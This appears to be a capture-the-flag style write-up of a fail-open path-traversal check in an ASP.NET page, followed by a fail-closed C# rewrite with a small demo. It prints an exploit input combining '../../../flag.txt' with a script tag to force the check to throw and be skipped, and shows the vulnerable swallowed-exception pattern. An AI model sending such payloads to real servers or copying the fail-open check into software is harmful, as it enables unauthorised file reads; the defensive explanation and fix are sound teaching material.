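// Fragment from an ASP.NET page: Request and Response are the page's own members.
bool isBad = false;   // defaults to "allowed"
try {
    // Reject any filename that contains "..".
    if (Request.Form["filename"] != null) {
        isBad = Request.Form["filename"].Contains("..") == true;
    }
} catch (Exception ex) {
    // Exception swallowed: if the check above throws, isBad stays false.
}
try {
    if (!isBad) {
        // Read the requested file from under the web root and return it.
        Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
    }
} catch (Exception ex) {
}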
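The code accepts a `filename` form parameter. If the value contains `..`, isBad is set to true and the file-read step is never reached.
So we need an error to be raised inside the first try block. The empty catch swallows the exception, and the assignment to isBad is skipped.
This is described in the following article:
https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/september/rare-aspnet-request-validation-bypass-using-request-encoding/
Send a GET request and pass the POST parameters filename=../../../flag.txt&test=<script>alert(1)</script>
This produces an error, and the check is skipped.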
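The check above fails open: an exception raised while reading the form value leaves isBad at false. The following is an added example, not code from the original post, of a fail-closed version that also canonicalises the path before comparing it to the web root. `SafeFileServe`, `ResolveOrNull` and the demo root are hypothetical names, and the throwing lambda is a constructed stand-in for `Request.Form["filename"]` raising an exception.

```csharp
using System;
using System.IO;

static class SafeFileServe
{
    // Returns the canonical path when the requested name stays inside baseDir,
    // otherwise null. readName models () => Request.Form["filename"] (assumption).
    public static string ResolveOrNull(string baseDir, Func<string> readName)
    {
        try
        {
            string name = readName();   // may throw, e.g. during request validation
            if (string.IsNullOrEmpty(name)) return null;

            string root = Path.GetFullPath(baseDir);
            string sep = Path.DirectorySeparatorChar.ToString();
            if (!root.EndsWith(sep)) root += sep;

            // Canonicalise first, then compare. This handles "..", absolute
            // paths and mixed separators instead of matching on a substring.
            string full = Path.GetFullPath(Path.Combine(root, name));

            // Case-insensitive compare assumes a Windows file system, as on the page.
            return full.StartsWith(root, StringComparison.OrdinalIgnoreCase) ? full : null;
        }
        catch (Exception)
        {
            // Any failure while validating means "deny", never "allow".
            return null;
        }
    }

    static void Main()
    {
        // Constructed demo root and inputs; nothing is read from disk.
        string root = Path.Combine(Path.GetTempPath(), "wwwroot-demo");

        Func<string> plain = () => "index.html";
        Func<string> traversal = () => "../../../flag.txt";
        Func<string> throwing = () => { throw new InvalidOperationException("validation failed"); };

        Console.WriteLine("plain name allowed:     " + (ResolveOrNull(root, plain) != null));
        Console.WriteLine("traversal allowed:      " + (ResolveOrNull(root, traversal) != null));
        Console.WriteLine("throwing input allowed: " + (ResolveOrNull(root, throwing) != null));
    }
}
```

The caller reads the file only when the return value is non-null, so both the traversal string and an input that makes the read throw end in a refusal.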